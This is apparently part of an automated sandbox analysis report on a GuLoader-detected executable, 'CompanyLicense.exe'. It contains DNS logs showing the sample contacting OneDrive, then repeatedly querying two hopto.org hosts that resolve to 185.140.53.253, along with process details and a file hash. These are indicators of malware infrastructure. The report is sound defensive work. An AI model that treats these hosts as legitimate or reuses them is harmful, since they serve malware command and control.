                                    Jan 19, 2021 17:16:14.361051083 CET53519328.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:16.555202007 CET5949453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:16.616471052 CET53594948.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:17.819614887 CET5591553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:17.876086950 CET53559158.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:20.080435991 CET4977953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:20.139585972 CET53497798.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:21.342369080 CET4945853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:21.393071890 CET53494588.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:23.585649014 CET5716453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:23.644537926 CET53571648.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:24.839747906 CET4984053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:24.896742105 CET53498408.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:27.103224039 CET5717453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:27.159734011 CET53571748.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:28.373641968 CET5853153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:28.430135965 CET53585318.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:30.653420925 CET4960853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:30.709765911 CET53496088.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:31.925923109 CET5568253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:31.985290051 CET53556828.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:34.204695940 CET6243653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:34.265736103 CET53624368.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:35.472865105 CET6123053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:35.537314892 CET53612308.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:37.777757883 CET6473053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:37.836141109 CET53647308.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:39.052273989 CET6062453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:39.112523079 CET53606248.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:41.310803890 CET6260053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:41.369627953 CET53626008.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:42.581015110 CET5320053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:42.639022112 CET53532008.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:44.838633060 CET6103453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:44.897322893 CET53610348.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:46.098861933 CET5768753192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:46.155225992 CET53576878.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:48.340233088 CET4983953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:48.404742956 CET53498398.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:49.565933943 CET5797553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:49.622330904 CET53579758.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:51.772027969 CET5761053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:51.819967985 CET53576108.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 19, 2021 17:14:20.323478937 CET192.168.2.48.8.8.80xd391Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:21.239258051 CET192.168.2.48.8.8.80xc44dStandard query (0)sqknbg.dm.files.1drv.comA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:22.696815968 CET192.168.2.48.8.8.80x3dabStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:23.976702929 CET192.168.2.48.8.8.80xfa67Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:26.234143972 CET192.168.2.48.8.8.80xbd93Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:27.468760014 CET192.168.2.48.8.8.80xf12cStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:29.706235886 CET192.168.2.48.8.8.80xba4fStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:30.943011999 CET192.168.2.48.8.8.80x14b9Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:33.177584887 CET192.168.2.48.8.8.80xf9d7Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:34.407461882 CET192.168.2.48.8.8.80x8275Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:36.651421070 CET192.168.2.48.8.8.80x2796Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:37.950375080 CET192.168.2.48.8.8.80x8112Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:40.318720102 CET192.168.2.48.8.8.80x885fStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:41.578357935 CET192.168.2.48.8.8.80x1e9Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:43.866233110 CET192.168.2.48.8.8.80xb475Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:45.117981911 CET192.168.2.48.8.8.80xcffaStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:47.368578911 CET192.168.2.48.8.8.80x300eStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:48.686530113 CET192.168.2.48.8.8.80xd415Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:50.952425003 CET192.168.2.48.8.8.80x93fdStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:52.201205015 CET192.168.2.48.8.8.80x3aafStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:54.446244001 CET192.168.2.48.8.8.80xe354Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:55.690269947 CET192.168.2.48.8.8.80xb8b8Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:58.136776924 CET192.168.2.48.8.8.80x7f8eStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:59.487055063 CET192.168.2.48.8.8.80xde20Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:01.789062023 CET192.168.2.48.8.8.80x6eb2Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:03.039455891 CET192.168.2.48.8.8.80x454fStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:05.269073963 CET192.168.2.48.8.8.80x80d3Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:06.311877966 CET192.168.2.48.8.8.80x80d3Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:07.562407970 CET192.168.2.48.8.8.80xf2c9Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:09.798381090 CET192.168.2.48.8.8.80xbe01Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:11.032475948 CET192.168.2.48.8.8.80x113cStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:13.283751965 CET192.168.2.48.8.8.80xe41cStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:14.540656090 CET192.168.2.48.8.8.80xeec6Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:28.757800102 CET192.168.2.48.8.8.80xfbfdStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:30.019778013 CET192.168.2.48.8.8.80x969eStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:32.265638113 CET192.168.2.48.8.8.80x3f0eStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:33.506709099 CET192.168.2.48.8.8.80x7ae3Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:35.753662109 CET192.168.2.48.8.8.80xf04bStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:37.014866114 CET192.168.2.48.8.8.80x7653Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:39.257890940 CET192.168.2.48.8.8.80xac4bStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:40.498341084 CET192.168.2.48.8.8.80x9466Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:42.731714010 CET192.168.2.48.8.8.80x1882Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:43.980668068 CET192.168.2.48.8.8.80xb347Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:46.222735882 CET192.168.2.48.8.8.80xdde8Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:47.490364075 CET192.168.2.48.8.8.80xda2Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:50.469167948 CET192.168.2.48.8.8.80xa29bStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:51.730165958 CET192.168.2.48.8.8.80x673bStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:53.997497082 CET192.168.2.48.8.8.80x17feStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:07.202050924 CET192.168.2.48.8.8.80x90f4Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:09.467921972 CET192.168.2.48.8.8.80x6360Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:10.766552925 CET192.168.2.48.8.8.80x696cStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:13.058108091 CET192.168.2.48.8.8.80x4581Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:14.301039934 CET192.168.2.48.8.8.80x2031Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:16.555202007 CET192.168.2.48.8.8.80x7900Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:17.819614887 CET192.168.2.48.8.8.80x1e2eStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:20.080435991 CET192.168.2.48.8.8.80xd577Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:21.342369080 CET192.168.2.48.8.8.80x4789Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:23.585649014 CET192.168.2.48.8.8.80x3d2aStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:24.839747906 CET192.168.2.48.8.8.80x94adStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:27.103224039 CET192.168.2.48.8.8.80x4bbaStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:28.373641968 CET192.168.2.48.8.8.80xdffdStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:30.653420925 CET192.168.2.48.8.8.80xcaedStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:31.925923109 CET192.168.2.48.8.8.80xf3c1Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:34.204695940 CET192.168.2.48.8.8.80x910bStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:35.472865105 CET192.168.2.48.8.8.80x59d9Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:37.777757883 CET192.168.2.48.8.8.80x9222Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:39.052273989 CET192.168.2.48.8.8.80x6cabStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:41.310803890 CET192.168.2.48.8.8.80x2b6bStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:42.581015110 CET192.168.2.48.8.8.80xa7bbStandard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:44.838633060 CET192.168.2.48.8.8.80xed0eStandard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:46.098861933 CET192.168.2.48.8.8.80x3328Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:48.340233088 CET192.168.2.48.8.8.80x11f3Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:49.565933943 CET192.168.2.48.8.8.80xace5Standard query (0)sheilabeltagy3m.hopto.orgA (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:51.772027969 CET192.168.2.48.8.8.80xf495Standard query (0)northside.hopto.orgA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 19, 2021 17:14:20.374639988 CET8.8.8.8192.168.2.40xd391No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                    Jan 19, 2021 17:14:21.313652992 CET8.8.8.8192.168.2.40xc44dNo error (0)sqknbg.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                    Jan 19, 2021 17:14:21.313652992 CET8.8.8.8192.168.2.40xc44dNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                    Jan 19, 2021 17:14:22.759778976 CET8.8.8.8192.168.2.40x3dabNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:24.036922932 CET8.8.8.8192.168.2.40xfa67No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:26.292227030 CET8.8.8.8192.168.2.40xbd93No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:27.530553102 CET8.8.8.8192.168.2.40xf12cNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:29.762629986 CET8.8.8.8192.168.2.40xba4fNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:30.999347925 CET8.8.8.8192.168.2.40x14b9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:33.234193087 CET8.8.8.8192.168.2.40xf9d7No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:34.473480940 CET8.8.8.8192.168.2.40x8275No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:36.710648060 CET8.8.8.8192.168.2.40x2796No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:38.008048058 CET8.8.8.8192.168.2.40x8112No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:40.366662979 CET8.8.8.8192.168.2.40x885fNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:41.635349989 CET8.8.8.8192.168.2.40x1e9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:43.922911882 CET8.8.8.8192.168.2.40xb475No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:45.174139023 CET8.8.8.8192.168.2.40xcffaNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:47.432704926 CET8.8.8.8192.168.2.40x300eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:48.743086100 CET8.8.8.8192.168.2.40xd415No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:51.014060020 CET8.8.8.8192.168.2.40x93fdNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:52.257812977 CET8.8.8.8192.168.2.40x3aafNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:54.496059895 CET8.8.8.8192.168.2.40xe354No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:55.746643066 CET8.8.8.8192.168.2.40xb8b8No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:58.197926998 CET8.8.8.8192.168.2.40x7f8eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:14:59.548501015 CET8.8.8.8192.168.2.40xde20No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:01.845561981 CET8.8.8.8192.168.2.40x6eb2No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:03.095740080 CET8.8.8.8192.168.2.40x454fNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:06.368491888 CET8.8.8.8192.168.2.40x80d3No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:07.610485077 CET8.8.8.8192.168.2.40xf2c9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:09.849160910 CET8.8.8.8192.168.2.40xbe01No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:11.093702078 CET8.8.8.8192.168.2.40x113cNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:13.343240023 CET8.8.8.8192.168.2.40xe41cNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:14.597177029 CET8.8.8.8192.168.2.40xeec6No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:28.815994978 CET8.8.8.8192.168.2.40xfbfdNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:30.076164007 CET8.8.8.8192.168.2.40x969eNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:32.326874018 CET8.8.8.8192.168.2.40x3f0eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:33.564708948 CET8.8.8.8192.168.2.40x7ae3No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:35.809885979 CET8.8.8.8192.168.2.40xf04bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:37.073565960 CET8.8.8.8192.168.2.40x7653No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:39.317043066 CET8.8.8.8192.168.2.40xac4bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:40.546051025 CET8.8.8.8192.168.2.40x9466No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:42.791768074 CET8.8.8.8192.168.2.40x1882No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:44.036858082 CET8.8.8.8192.168.2.40xb347No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:46.287039042 CET8.8.8.8192.168.2.40xdde8No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:47.547096968 CET8.8.8.8192.168.2.40xda2No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:50.533364058 CET8.8.8.8192.168.2.40xa29bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:51.789258957 CET8.8.8.8192.168.2.40x673bNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:54.061994076 CET8.8.8.8192.168.2.40x17feNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:07.266206980 CET8.8.8.8192.168.2.40x90f4No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:09.529237032 CET8.8.8.8192.168.2.40x6360No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:10.823873997 CET8.8.8.8192.168.2.40x696cNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:13.114248037 CET8.8.8.8192.168.2.40x4581No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:14.361051083 CET8.8.8.8192.168.2.40x2031No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:16.616471052 CET8.8.8.8192.168.2.40x7900No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:17.876086950 CET8.8.8.8192.168.2.40x1e2eNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:20.139585972 CET8.8.8.8192.168.2.40xd577No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:21.393071890 CET8.8.8.8192.168.2.40x4789No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:23.644537926 CET8.8.8.8192.168.2.40x3d2aNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:24.896742105 CET8.8.8.8192.168.2.40x94adNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:27.159734011 CET8.8.8.8192.168.2.40x4bbaNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:28.430135965 CET8.8.8.8192.168.2.40xdffdNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:30.709765911 CET8.8.8.8192.168.2.40xcaedNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:31.985290051 CET8.8.8.8192.168.2.40xf3c1No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:34.265736103 CET8.8.8.8192.168.2.40x910bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:35.537314892 CET8.8.8.8192.168.2.40x59d9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:37.836141109 CET8.8.8.8192.168.2.40x9222No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:39.112523079 CET8.8.8.8192.168.2.40x6cabNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:41.369627953 CET8.8.8.8192.168.2.40x2b6bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:42.639022112 CET8.8.8.8192.168.2.40xa7bbNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:44.897322893 CET8.8.8.8192.168.2.40xed0eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:46.155225992 CET8.8.8.8192.168.2.40x3328No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:48.404742956 CET8.8.8.8192.168.2.40x11f3No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:49.622330904 CET8.8.8.8192.168.2.40xace5No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:51.819967985 CET8.8.8.8192.168.2.40xf495No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)

                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: CompanyLicense.exe PID: 5148 Parent PID: 5680

                                    General

                                    Start time:17:14:06
                                    Start date:19/01/2021
                                    Path:C:\Users\user\Desktop\CompanyLicense.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\CompanyLicense.exe'
                                    Imagebase:0x400000
                                    File size:98304 bytes
                                    MD5 hash:ACE3E9FC3A2277AA4E72881C9F204642
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Visual Basic
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: CompanyLicense.exe PID: 6572 Parent PID: 5148

                                    General

                                    Start time:17:14:13
                                    Start date:19/01/2021
                                    Path:C:\Users\user\Desktop\CompanyLicense.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\CompanyLicense.exe'
                                    Imagebase:0x400000
                                    File size:98304 bytes
                                    MD5 hash:ACE3E9FC3A2277AA4E72881C9F204642
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: CompanyLicense.exe PID: 5148 Parent PID: 5680 CompanyLicense.exeCOMMON

                                      Execution Graph

                                      Execution Coverage:15.6%
                                      Dynamic/Decrypted Code Coverage:66.5%
                                      Signature Coverage:23.4%
                                      Total number of Nodes:1060
                                      Total number of Limit Nodes:97

                                      Graph

